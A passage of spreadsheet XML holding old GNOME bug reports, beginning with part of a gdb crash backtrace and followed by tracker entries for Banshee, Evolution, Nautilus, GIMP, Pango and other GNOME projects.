      v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 215
	max_sequential_handler_number = 4457
	return_value_altered = 0
#14 0xb7738627 in IA__g_signal_emit_valist (instance=0x83a11c8 signal_id=215 detail=0 
    var_args=0xbfc781e4 Â°k7\bWÃ¡ÃˆÂ·Âº\237Â¸Â·Â¬{ÃŠÂ·\020\022:\bÃˆ\202Ã‡Â¿Ãˆ\216Â¹Â·Ãˆ\021:\bÃ¸\226&lt;\b0Â³.\bÂ¬\202Ã‡Â¿Â°\202Ã‡Â¿) at gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1213245474 v_long = -1213245474 v_int64 = 100939108145118 v_double = 4.9870545656357154e-310 v_pointer = 0xb7af57de} {v_int = 137848024 
    v_long = 137848024 v_int64 = -4627588151882849064 v_double = -0.18362713242712547 v_pointer = 0x83764d8} {v_int = 1 v_long = 1 v_int64 = -5195948922421379071 
    v_double = -1.8625330512604023e-39 v_pointer = 0x1} {v_int = -1217296568 v_long = -1217296568 v_int64 = -5234696031229081784 v_double = -4.7754109116499257e-42 
    v_pointer = 0xb7718748} {v_int = 24 v_long = 24 v_int64 = -4627588220740173800 v_double = -0.18362522125244207 v_pointer = 0x18} {v_int = -1218013540 
    v_long = -1218013540 v_int64 = -5227168160445720932 v_double = -1.5330913691937885e-41 v_pointer = 0xb766969c} {v_int = -1209775136 v_long = -1209775136 
    v_int64 = -4627588148935504928 v_double = -0.1836272142323585 v_pointer = 0xb7e44be0} {v_int = -1209775120 v_long = -1209775120 v_int64 = -4627588011496551440 
    v_double = -0.18363102892962457 v_pointer = 0xb7e44bf0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 138225312 data = {{v_int = 137067392 v_uint = 137067392 v_long = 137067392 v_ulong = 137067392 v_int64 = -5230931018593371264 
      v_uint64 = 13215813055116180352 v_float = 5.16036143e-34 v_double = -8.6095122536349236e-42 v_pointer = 0x82b7b80} {v_int = -1217916640 v_uint = 3077050656 
      v_long = -1217916640 v_ulong = 3077050656 v_int64 = 593008405378502944 v_uint64 = 593008405378502944 v_float = -1.38322648e-05 v_double = 5.070859502234855e-269 
      v_pointer = 0xb7681120}}}
	error = 
	instance_and_params = (GValue *) 0xbfc77f9c
	stack_values = {{g_type = 135355776 data = {{v_int = 138023368 v_uint = 138023368 v_long = 138023368 v_ulong = 138023368 v_int64 = 138023368 v_uint64 = 138023368 
        v_float = 5.59932408e-34 v_double = 6.8192604452104041e-316 v_pointer = 0x83a11c8} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 137260312 data = {{v_int = 139825808 v_uint = 139825808 v_long = 139825808 v_ulong = 139825808 
        v_int64 = 139825808 v_uint64 = 139825808 v_float = 6.42696394e-34 v_double = 6.9083128134794138e-316 v_pointer = 0x8559290} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 137265464 data = {{v_int = 137278256 v_uint = 137278256 
        v_long = 137278256 v_ulong = 137278256 v_int64 = 137278256 v_uint64 = 137278256 v_float = 5.25718543e-34 v_double = 6.7824470210599978e-316 v_pointer = 0x82eb330} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 32 data = {{v_int = -1215328751 
        v_uint = 3079638545 v_long = -1215328751 v_ulong = 3079638545 v_int64 = 3079638545 v_uint64 = 3079638545 v_float = -1.71130832e-05 
        v_double = 1.5215436066930218e-314 v_pointer = 0xb78f8e11} {v_int = 32 v_uint = 32 v_long = 32 v_ulong = 32 v_int64 = 32 v_uint64 = 32 v_float = 4.48415509e-44 
        v_double = 1.5810100666919889e-322 v_pointer = 0x20}}} {g_type = 0 data = {{v_int = 139861792 v_uint = 139861792 v_long = 139861792 v_ulong = 139861792 
        v_int64 = 581548811220295456 v_uint64 = 581548811220295456 v_float = 6.44348698e-34 v_double = 8.5541376292763027e-270 v_pointer = 0x8561f20} {v_int = 1 v_uint = 1 
        v_long = 1 v_ulong = 1 v_int64 = 1176821039105 v_uint64 = 1176821039105 v_float = 1.40129846e-45 v_double = 5.8142684672497868e-312 v_pointer = 0x1}}} {
    g_type = 28 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 1176821039104 v_uint64 = 1176821039104 v_float = 0 v_double = 5.8142684672448461e-312 
        v_pointer = 0x0} {v_int = -1209769547 v_uint = 3085197749 v_long = -1209769547 v_ulong = 3085197749 v_int64 = -5195604256800611915 v_uint64 = 13251139816908939701 
        v_float = -2.72252164e-05 v_double = -1.9749854570182727e-39 v_pointer = 0xb7e461b5}}} {g_type = 1 data = {{v_int = -1077444568 v_uint = 3217522728 
        v_long = -1077444568 v_ulong = 3217522728 v_int64 = -5195641498329710552 v_uint64 = 13251102575379841064 v_float = -1.55859852 v_double = -1.962834841207151e-39 
        v_pointer = 0xbfc78028} {v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = -5228248949093040127 v_uint64 = 13218495124616511489 v_float = 1.40129846e-45 
        v_double = -1.2576040649237094e-41 v_pointer = 0x1}}} {g_type = 3217522808 data = {{v_int = -1217620126 v_uint = 3077347170 v_long = -1217620126 
        v_ulong = 3077347170 v_int64 = 579865599294609250 v_uint64 = 579865599294609250 v_float = -1.41019427e-05 v_double = 6.6479124862910184e-270 v_pointer = 0xb76c9762} 
      {v_int = 71 v_uint = 71 v_long = 71 v_ulong = 71 v_int64 = 412316860487 v_uint64 = 412316860487 v_float = 9.9492191e-44 v_double = 2.037115959677448e-312 
        v_pointer = 0x47}}} {g_type = 135402376 data = {{v_int = 166 v_uint = 166 v_long = 166 v_ulong = 166 v_int64 = 712964571302 v_uint64 = 712964571302 
        v_float = 2.32615545e-43 v_double = 3.522513013822501e-312 v_pointer = 0xa6} {v_int = 139861792 v_uint = 139861792 v_long = 139861792 v_ulong = 139861792 
        v_int64 = 137578815264 v_uint64 = 137578815264 v_float = 6.44348698e-34 v_double = 6.7972966217481708e-313 v_pointer = 0x8561f20}}} {g_type = 135010624 data = {{
        v_int = 3 v_uint = 3 v_long = 3 v_ulong = 3 v_int64 = 8589934595 v_uint64 = 8589934595 v_float = 4.20389539e-45 v_double = 4.2439915834127416e-314 
        v_pointer = 0x3} {v_int = 135011672 v_uint = 135011672 v_long = 135011672 v_ulong = 135011672 v_int64 = 103214226776 v_uint64 = 103214226776 
        v_float = 4.21642109e-34 v_double = 5.0994603612089322e-313 v_pointer = 0x80c1d58}}} {g_type = 139861804 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = -5195970547581714432 v_uint64 = 13250773526127837184 v_float = 0 v_double = -1.8554775134925265e-39 v_pointer = 0x0} {v_int = 139861792 
        v_uint = 139861792 v_long = 139861792 v_ulong = 139861792 v_int64 = 600256554890305312 v_uint64 = 600256554890305312 v_float = 6.44348698e-34 
        v_double = 1.5551683493143596e-268 v_pointer = 0x8561f20}}} {g_type = 3217522840 data = {{v_int = -1217206827 v_uint = 3077760469 v_long = -1217206827 
        v_ulong = 3077760469 v_int64 = -5203599703501773355 v_uint64 = 13243144370207778261 v_float = -1.4477836e-05 v_double = -5.7627128248433776e-40 
        v_pointer = 0xb772e5d5} {v_int = -1211557469 v_uint = 3083409827 v_long = -1211557469 v_ulong = 3083409827 v_int64 = -5234686066899215965 
        v_uint64 = 13212058006810335651 v_float = -2.39730052e-05 v_double = -4.7817605489735624e-42 v_pointer = 0xb7c919a3}}} {g_type = 3081721822 data = {{
        v_int = -1209776132 v_uint = 3085191164 v_long = -1209776132 v_ulong = 3085191164 v_int64 = 581140586114074620 v_uint64 = 581140586114074620 
        v_float = -2.72132384e-05 v_double = 7.867822120869064e-270 v_pointer = 0xb7e447fc} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = -5227534696031715328 
        v_uint64 = 13219209377677836288 v_float = 0 v_double = -1.43966338884341e-41 v_pointer = 0x0}}} {g_type = 136823200 data = {{v_int = -1211466836 
        v_uint = 3083500460 v_long = -1211466836 v_ulong = 3083500460 v_int64 = -4627588423815103572 v_uint64 = 13819155649894448044 v_float = -2.41378657e-05 
        v_double = -0.18361958479087315 v_pointer = 0xb7ca7bac} {v_int = -1213245259 v_uint = 3081722037 v_long = -1213245259 v_ulong = 3081722037 
        v_int64 = -4627588114579236683 v_uint64 = 13819155959130314933 v_float = -2.09029331e-05 v_double = -0.18362816781035965 v_pointer = 0xb7af58b5}}} {
    g_type = 137953964 data = {{v_int = -1218795327 v_uint = 3076171969 v_long = -1218795327 v_ulong = 3076171969 v_int64 = -5195970544505542463 
        v_uint64 = 13250773529204009153 v_float = -1.30331036e-05 v_double = -1.8554785171404612e-39 v_pointer = 0xb75aa8c1} {v_int = 23501 v_uint = 23501 v_long = 23501 
        v_ulong = 23501 v_int64 = 581964907512093645 v_uint64 = 581964907512093645 v_float = 3.29319152e-41 v_double = 9.2536863187127513e-270 v_pointer = 0x5bcd}}} {
    g_type = 3217523016 data = {{v_int = -1209781167 v_uint = 3085186129 v_long = -1209781167 v_ulong = 3085186129 v_int64 = 100939111609425 v_uint64 = 100939111609425 
        v_float = -2.72040797e-05 v_double = 4.987054736795223e-310 v_pointer = 0xb7e43451} {v_int = -1211466836 v_uint = 3083500460 v_long = -1211466836 
        v_ulong = 3083500460 v_int64 = -5234696031223252052 v_uint64 = 13212048042486299564 v_float = -2.41378657e-05 v_double = -4.7754109153648453e-42 
        v_pointer = 0xb7ca7bac}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfc77fb0
	node = (SignalNode *) 0x82e83d8
	i = 2
	n_params = 2
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#15 0xb77387e9 in IA__g_signal_emit (instance=0x83a11c8 signal_id=215 detail=0) at gsignal.c:2243
	var_args = 0xbfc781dc Ã¸\226&lt;\b0Â³.\bÂ°k7\bWÃ¡ÃˆÂ·Âº\237Â¸Â·Â¬{ÃŠÂ·\020\022:\bÃˆ\202Ã‡Â¿Ãˆ\216Â¹Â·Ãˆ\021:\bÃ¸\226&lt;\b0Â³.\bÂ¬\202Ã‡Â¿Â°\202Ã‡Â¿
#16 0xb7b8a011 in IA__gtk_tree_view_row_activated (tree_view=0x83a11c8 path=0x83c96f8 column=0x82eb330) at gtktreeview.c:11465
	__PRETTY_FUNCTION__ = IA__gtk_tree_view_row_activated
#17 0xb7b98ec8 in gtk_tree_view_button_press (widget=0x83a11c8 event=0x83add40) at gtktreeview.c:2695
	anchor = 
	iter = {stamp = -1217135119 user_data = 0x8476e60 user_data2 = 0x0 user_data3 = 0x0}
	tree_view = 
	list = 
	column = 
	i = 
	background_area = {x = 0 y = 71 width = 274 height = 25}
	cell_area = {x = 1 y = 72 width = 272 height = 23}
	vertical_separator = 2
	horizontal_separator = 2
	__PRETTY_FUNCTION__ = gtk_tree_view_button_press
#18 0xb7a976b0 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80fe508 return_value=0xbfc78450 n_param_values=2 param_values=0xbfc7852c invocation_hint=0xbfc7843c 
    marshal_data=0xb7b98620) at gtkmarshalers.c:84
	data1 = (gpointer) 0x83a11c8
	data2 = 
	v_return = 
	__PRETTY_FUNCTION__ = _gtk_marshal_BOOLEAN__BOXED
#19 0xb7724e49 in g_type_class_meta_marshal (closure=0x80fe508 return_value=0xbfc78450 n_param_values=2 param_values=0xbfc7852c invocation_hint=0xbfc7843c marshal_data=0xb0)
    at gclosure.c:567
	callback = 
#20 0xb772662b in IA__g_closure_invoke (closure=0x80fe508 return_value=0xbfc78450 n_param_values=2 param_values=0xbfc7852c invocation_hint=0xbfc7843c) at gclosure.c:490
	marshal = (GClosureMarshal) 0xb7724e00 
	marshal_data = (gpointer) 0xb0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#21 0xb7737753 in signal_emit_unlocked_R (node=0x80fe7d0 detail=0 instance=0x83a11c8 emission_return=0xbfc786ec instance_and_params=0xbfc7852c) at gsignal.c:2478
	tmp = 
	handler = (Handler *) 0xbfc78408
	accumulator = (SignalAccumulator *) 0x80fe728
	emission = {next = 0x0 instance = 0x83a11c8 ihint = {signal_id = 43 detail = 0 run_type = G_SIGNAL_RUN_LAST} state = EMISSION_RUN chain_type = 135355776}
	class_closure = (GClosure *) 0x80fe508
	handler_list = (Handler *) 0x0
	return_accu = (GValue *) 0xbfc78450
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
      v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 43
	max_sequential_handler_number = 4457
	return_value_altered = 0
#22 0xb77383ef in IA__g_signal_emit_valist (instance=0x83a11c8 signal_id=43 detail=0 var_args=) at gsignal.c:2209
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1077442680 v_long = -1077442680 v_int64 = 3217524616 v_double = 1.5896683774141488e-314 v_pointer = 0xbfc78788} {v_int = 0 v_long = 0 
    v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 
    v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
      v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	error = 
	instance_and_params = (GValue *) 0xbfc7852c
	stack_values = {{g_type = 135355776 data = {{v_int = 138023368 v_uint = 138023368 v_long = 138023368 v_ulong = 138023368 v_int64 = 138023368 v_uint64 = 138023368 
        v_float = 5.59932408e-34 v_double = 6.8192604452104041e-316 v_pointer = 0x83a11c8} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 135259600 data = {{v_int = 138075456 v_uint = 138075456 v_long = 138075456 v_ulong = 138075456 
        v_int64 = 138075456 v_uint64 = 138075456 v_float = 5.62324171e-34 v_double = 6.821833934346462e-316 v_pointer = 0x83add40} {v_int = 134217728 v_uint = 134217728 
        v_long = 134217728 v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728 v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 v_pointer = 0x8000000}}} 
  {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = -5227534696031715328 v_uint64 = 13219209377677836288 v_float = 0 
        v_double = -1.43966338884341e-41 v_pointer = 0x0} {v_int = -1216091572 v_uint = 3078875724 v_long = -1216091572 v_ulong = 3078875724 v_int64 = 580327875216140876 
        v_uint64 = 580327875216140876 v_float = -1.57255199e-05 v_double = 7.0365058497021015e-270 v_pointer = 0xb783ea4c}}} {g_type = 3217524104 data = {{
        v_int = -1216767020 v_uint = 3078200276 v_long = -1216767020 v_ulong = 3078200276 v_int64 = 580335777955290068 v_uint64 = 580335777955290068 
        v_float = -1.48778381e-05 v_double = 7.0431489644374963e-270 v_pointer = 0xb7799bd4} {v_int = 1073741824 v_uint = 1073741824 v_long = 1073741824 
        v_ulong = 1073741824 v_int64 = -4627583203144630272 v_uint64 = 13819160870564921344 v_float = 2 v_double = -0.18376448750495911 v_pointer = 0x40000000}}} {
    g_type = 3079998332 data = {{v_int = 138094616 v_uint = 138094616 v_long = 138094616 v_ulong = 138094616 v_int64 = 600256554888538136 v_uint64 = 600256554888538136 
        v_float = 5.63203955e-34 v_double = 1.5551683488389982e-268 v_pointer = 0x83b2818} {v_int = -1077443160 v_uint = 3217524136 v_long = -1077443160 
        v_ulong = 3217524136 v_int64 = -5219446388927527512 v_uint64 = 13227297684782024104 v_float = -1.55876637 v_double = -4.8217705779340442e-41 
        v_pointer = 0xbfc785a8}}} {g_type = 138094616 data = {{v_int = 135150344 v_uint = 135150344 v_long = 135150344 v_ulong = 135150344 v_int64 = 17315019528 
        v_uint64 = 17315019528 v_float = 4.28009615e-34 v_double = 8.5547563058551159e-314 v_pointer = 0x80e3b08} {v_int = -1214968964 v_uint = 3079998332 
        v_long = -1214968964 v_ulong = 3079998332 v_int64 = -5218251962955003012 v_uint64 = 13228492110754548604 v_float = -1.7767532e-05 v_double = -6.0395820053102321e-41 
        v_pointer = 0xb7950b7c}}} {g_type = 138094616 data = {{v_int = -1077443128 v_uint = 3217524168 v_long = -1077443128 v_ulong = 3217524168 
        v_int64 = -5227534692814191160 v_uint64 = 13219209380895360456 v_float = -1.55877018 v_double = -1.4396642089732861e-41 v_pointer = 0xbfc785c8} {v_int = 138094616 
        v_uint = 138094616 v_long = 138094616 v_ulong = 138094616 v_int64 = 580477199698307096 v_uint64 = 580477199698307096 v_float = 5.63203955e-34 
        v_double = 7.1620293737747693e-270 v_pointer = 0x83b2818}}} {g_type = 3217524184 data = {{v_int = -1215406710 v_uint = 3079560586 v_long = -1215406710 
        v_ulong = 3079560586 v_int64 = -5218251962955440758 v_uint64 = 13228492110754110858 v_float = -1.69712766e-05 v_double = -6.0395820048639155e-41 
        v_pointer = 0xb78e5d8a} {v_int = 1079282216 v_uint = 1079282216 v_long = 1079282216 v_ulong = 1079282216 v_int64 = -4627582928261182936 
        v_uint64 = 13819161145448368680 v_float = 3.32093239 v_double = -0.18377211705326713 v_pointer = 0x40548a28}}} {g_type = 3079998332 data = {{v_int = 135168176 
        v_uint = 135168176 v_long = 135168176 v_ulong = 135168176 v_int64 = 600256554885611696 v_uint64 = 600256554885611696 v_float = 4.28828421e-34 
        v_double = 1.5551683480518007e-268 v_pointer = 0x80e80b0} {v_int = -1077443080 v_uint = 3217524216 v_long = -1077443080 v_ulong = 3217524216 
        v_int64 = -5219151599552199176 v_uint64 = 13227592474157352440 v_float = -1.5587759 v_double = -5.1223315823009949e-41 v_pointer = 0xbfc785f8}}} {g_type = 135168176 
    data = {{v_int = 135146272 v_uint = 135146272 v_long = 135146272 v_ulong = 135146272 v_int64 = 1159776316192 v_uint64 = 1159776316192 v_float = 4.27822638e-34 
        v_double = 5.7300563469078224e-312 v_pointer = 0x80e2b20} {v_int = -1217130268 v_uint = 3077837028 v_long = -1217130268 v_ulong = 3077837028 
        v_int64 = -5218251962957164316 v_uint64 = 13228492110752387300 v_float = -1.4547466e-05 v_double = -6.0395820031066123e-41 v_pointer = 0xb77410e4}}} {
    g_type = 139758120 data = {{v_int = -1077443048 v_uint = 3217524248 v_long = -1077443048 v_ulong = 3217524248 v_int64 = -5227534692814191080 
        v_uint64 = 13219209380895360536 v_float = -1.55877972 v_double = -1.4396642089733065e-41 v_pointer = 0xbfc78618} {v_int = 135168176 v_uint = 135168176 
        v_long = 135168176 v_ulong = 135168176 v_int64 = 4615702465819345072 v_uint64 = 4615702465819345072 v_float = 4.28828421e-34 v_double = 3.7836609486986035 
        v_pointer = 0x80e80b0}}} {g_type = 138296080 data = {{v_int = -1217046928 v_uint = 3077920368 v_long = -1217046928 v_ulong = 3077920368 
        v_int64 = 600256557828363888 v_uint64 = 600256557828363888 v_float = -1.46232633e-05 v_double = 1.5551691396372024e-268 v_pointer = 0xb7755670} {v_int = 5 
        v_uint = 5 v_long = 5 v_ulong = 5 v_int64 = -4627582448304127995 v_uint64 = 13819161625405423621 v_float = 7.00649232e-45 v_double = -0.1837854385375978 
        v_pointer = 0x5}}} {g_type = 3077736574 data = {{v_int = 139758124 v_uint = 139758124 v_long = 139758124 v_ulong = 139758124 v_int64 = 21614594604 
        v_uint64 = 21614594604 v_float = 6.39588497e-34 v_double = 1.0679028642621983e-313 v_pointer = 0x8548a2c} {v_int = 4 v_uint = 4 v_long = 4 v_ulong = 4 
        v_int64 = -5227967839188549628 v_uint64 = 13218776234521001988 v_float = 5.60519386e-45 v_double = -1.3292574913209942e-41 v_pointer = 0x4}}} {g_type = 139758124 
    data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 600256571930312705 v_uint64 = 600256571930312705 v_float = 1.40129846e-45 
        v_double = 1.55517293298985e-268 v_pointer = 0x1} {v_int = -12149689</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-510789</t>
  </si>
  <si>
    <t>translate .room files</t>
  </si>
  <si>
    <t>As discussed on games-list the .room files should be translated. Attached patch adds the build logic for that.</t>
  </si>
  <si>
    <t>GIMP-326986</t>
  </si>
  <si>
    <t>PF_FILE not working</t>
  </si>
  <si>
    <t>PF_FILEis not working in CVS HEAD.
It returns an (undocumented) tuple instead of a path string. That is an incompatible change to the way it works up to gimp-2.2.
Regardless of that when a python-fu script is called for the second time in a row it attempts to load the previous returned value of the control (a tuple) as teh default value. This crashes the script as the input values to the control should be strings not tuples.
I think the better would be to revert this as it were before and when someone can spend some time in it to replace the pf_file by proper gtk_file_selection dialog.</t>
  </si>
  <si>
    <t>PANGO-73851</t>
  </si>
  <si>
    <t>enable-explicit-deps=yes broken</t>
  </si>
  <si>
    <t>The X libraries are not added to pangox.pc even though enable-explicit-deps
is yes because of a mistype in configure.in.
This breaks the build of several other GNOME2 packages on Solaris.
diff -u -r1.103 configure.in
--- configure.in	2002/03/06 17:04:39	1.103
+++ configure.in	2002/03/07 13:47:39
@@ -5707 +5707 @@
 AC_MSG_RESULT($enable_explicit_deps)
 if test $enable_explicit_deps = yes  then
-  PKGCONFIG_X_LIBS=$X_LIBS@ $X_EXTRA_LIBS
+  PKGCONFIG_X_LIBS=$X_LIBS $X_EXTRA_LIBS
   PKGCONFIG_XFT_LIBS=$XFT_LIBS
   PKGCONFIG_FREETYPE_LIBS=$XFT_LIBS
 else</t>
  </si>
  <si>
    <t>laszlo.peter</t>
  </si>
  <si>
    <t>BANSHEE-344774</t>
  </si>
  <si>
    <t>D-Bus interface crashes Banshee when playing radio stream</t>
  </si>
  <si>
    <t>When Banshee is playing an Internet radio stream and the GetPlayingArtist or GetPlayingAlbum method is invoked on the D-Bus interface Banshee immediately crashes.  GetPlayingUri and GetPlayingTitle work as expected.  The problem does not occur if Banshee is playing a file from the local library or if no song is playing.
Steps to reproduce:
1. Start Banshee.
2. Go to Music -&gt; Open Location in the menu.
3. Enter http://beatlesradio.com:8080 and click Open.
4. Let the music start playing.
5. Run the command dbus-send --session --dest=org.gnome.Banshee --print-reply /org/gnome/Banshee/Player org.gnome.Banshee.Core.GetPlayingArtist.
Expected results:
*  The dbus-send command returns the current artist.
Actual results:
*  Banshee crashes.
Here's the stack trace that Banshee spits out:
Unhandled Exception: System.Reflection.AmbiguousMatchException: Ambiguous matching in method resolution
in  Default:SelectMethod (System.Reflection.BindingFlagsSystem.Reflection.MethodBase[]System.Type[]System.Reflection.ParameterModifier[])
in  System.Activator:CreateInstance (System.TypeSystem.Reflection.BindingFlagsSystem.Reflection.Binderobject[]System.Globalization.CultureInfoobject[])
in  System.Activator:CreateInstance (System.Typeobject[]object[])
in  System.Activator:CreateInstance (System.Typeobject[])
in  DBus.Arguments:AppendType (System.Typeobject)
in  DBus.Arguments:AppendResults (System.Reflection.MethodInfoobjectobject[])
in  DBus.Handler:HandleMethod (DBus.MethodCall)
in  DBus.Handler:Message_Called (intptrintptrintptr)
in  (wrapper native-to-managed) DBus.Handler:Message_Called (intptrintptrintptr)
in (unmanaged) 0xa6fc8af3
in  (wrapper managed-to-native) Gtk.Application:gtk_main ()
in  Gtk.Application:Run ()
in  Banshee.BansheeEntry:Startup (string[])
in  Banshee.BansheeEntry:Main (string[])
The problem happens in RemotePlayer.cs.  PlayerEngineCore.CurrentTrack.Artist (or .Album) is null when Banshee is playing a radio stream but D-Bus does not accept a null for a string return value.</t>
  </si>
  <si>
    <t>GNOME-PANEL-73835</t>
  </si>
  <si>
    <t>The popup menu shortcuts are now giving the context menu instead of the GNOME Menu</t>
  </si>
  <si>
    <t>The keyboard shortcut has been changed between 1.4 and 2.0. The default 
Mod1-F1 has been changed to popup the context menu instead of the GNOME
menu. It is not clear which panel it affects.
Some comments from email -
2. Popup menu key field in Panel capplet
In 1.4 this field specified the shortcut key to press to open the
Global Menu. The Global Menu opened at the location of the mouse
pointer.
In 2.0 this field seems to specify the shortcut key to press to open
the Panel menu for a particular panel. (Panel menu contains Add to
panel Create panel Remove this panel and so on.) Does this make
sense? From my brief glance at it yesterday it looked like you had to
click the panel (to identify it as the current panel) then use the
shortcut key to open the Panel menu. But why would someone use the
shortcut key when a right-click would be faster?
Would it be possible to change this back so that the shortcut key opens
the GNOME Menu?</t>
  </si>
  <si>
    <t>RHYTHMBOX-478912</t>
  </si>
  <si>
    <t>Fix metadata test program</t>
  </si>
  <si>
    <t>Completely broken hand-made URIs patch attached.</t>
  </si>
  <si>
    <t>EVOLUTION-458828</t>
  </si>
  <si>
    <t>what is the Top Posting Option?</t>
  </si>
  <si>
    <t>Top Posting Option (Not Recommended)
what does it mean? answering above the quoted message (everybody's doing this already so i have no idea what this option would change)?
i have no idea...</t>
  </si>
  <si>
    <t>NAUTILUS-46897</t>
  </si>
  <si>
    <t>Permissions error dialog not displayed when navigating to unreadable location</t>
  </si>
  <si>
    <t xml:space="preserve">For an example when logged in as a non-root user navigate to the /root
directory.  It should have 0 permissions for normal users.  This directory
displays empty but there should be a dialog stating why there are no visible
contents.
See bug 45157 which is the parent of this bug.
------- Additional Comments From sullivan@eazel.com 2001-02-22 17:06:41 ----
We are pretty sure that this broke recently with changes to when 
load_directory is called. The directory view isn't catching the load_directory 
error and thus isn't reporting it to the user. I think we can live with this 
broken though it makes me sad. (It's not a regression from PR3 because 
this behavior was changed after PR3 when bug 45157 was fixed.
------- Additional Comments From sullivan@eazel.com 2001-03-02 06:45:31 ----
There's some more discussion of the current flaky behavior in bug 40546.
------- Additional Comments From brett@eazel.com 2001-03-02 10:46:42 ----
Verified (due to bug 45157) that this should not be considered a regression
despite my comments in bug 40546.
------- Additional Comments From eli@eazel.com 2001-03-26 11:10:31 ----
QA Assigning to self.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:00 -------
</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-126230</t>
  </si>
  <si>
    <t>Should not need nautilus to manage the background</t>
  </si>
  <si>
    <t>This bug was originally reported in the debian BTS for more info see the
details here :
http://bugs.debian.org/217859
To summarize:
* if /apps/nautilus/preferences/background_set key is set to true
gnome-settings-daemon use nautilus to set the background
* if the key is set to false nautilus is not needed.
So if nautilus is removed and the key is set to true the control-center
can't be used to change the  wallpaper anymore. 
The control-center should be able to manage the background even if nautilus
is not installed ...</t>
  </si>
  <si>
    <t>EVOLUTION-261842</t>
  </si>
  <si>
    <t>evo locks up but I have no idea why</t>
  </si>
  <si>
    <t>I'm sorry that is a completely useless summary.  Evolution has locked up
twice today but afaict there is not particular reason why.  Most recently
it stopped responding while I was composing an e-mail.  I tried moving the
compose window and noticed that neither the compose window or the Evolution
shell were redrawing so afaict evolution has crashed.  I will attach a bt
I obtained by attaching gdb to the evolution-1.5 process.  I hope it is
somewhat helpful. :-/</t>
  </si>
  <si>
    <t>pete</t>
  </si>
  <si>
    <t>AT-SPI-351657</t>
  </si>
  <si>
    <t>API documentation issues with 2.15 release</t>
  </si>
  <si>
    <t>The following functions do not seem to have any documentation
in the c-code or in the generated gtk-docs:
spi_document_interface_new
cspi_attribute_set_from_sequence
AccessibleTable_getRowColumnExtentsAtIndex
All of the AccessibleDocument_* interfaces (aside from _ref
and _unref).
The following are documented in the c-code but not found in
the generated gtk-docs:
AccessibleDocument_ref
AccessibleDocument_unref
AccessibleSelection_deselectChild
AccessibleTable_getRowColumnExtentsAtIndex
AccessibleText_getAttributeRun
AccessibleText_getDefaultAttributeSet
AccessibleValue_getMinimumIncrement
Accessible_getDocument
Accessible_isDocument
None of the new functions seem to have Since: tags.
The Release Engineering API/ABI rules for Platform Libraries imply
that properly documenting functions includes making sure they are
actually in the generated gtk-docs and using Since/Deprecated tags as
appropriate:
http://live.gnome.org/ReleasePlanning/ModuleRequirements/Platform</t>
  </si>
  <si>
    <t>BONOBO-ACTIVATION_[WAS:_OAF]-80525</t>
  </si>
  <si>
    <t>incorrect module flags in tests/</t>
  </si>
  <si>
    <t>the attached patch was needed to pass 'make check'  in bonobo-activation/tests</t>
  </si>
  <si>
    <t>EVOLUTION-248974</t>
  </si>
  <si>
    <t>[GOK]Evolution crashed after click Menus in GOK</t>
  </si>
  <si>
    <t>Steps to reproduce the problem:
1. Start evolution and GOK.
2. Highlight a message in evolution.
3  In GOK main window click Menus-&gt;Action-&gt;Reply to Sender.
4. A compose window pops up.In GOK main window click Menus.
Actual Results:
Evolution crashed.
Expected Results:
GOK should display the compose window menus.
How often does this happen? 
always
Additional Information:
Can't get the stacktrace because all the windows froze after evolution
crash. You must re-login to start them again.</t>
  </si>
  <si>
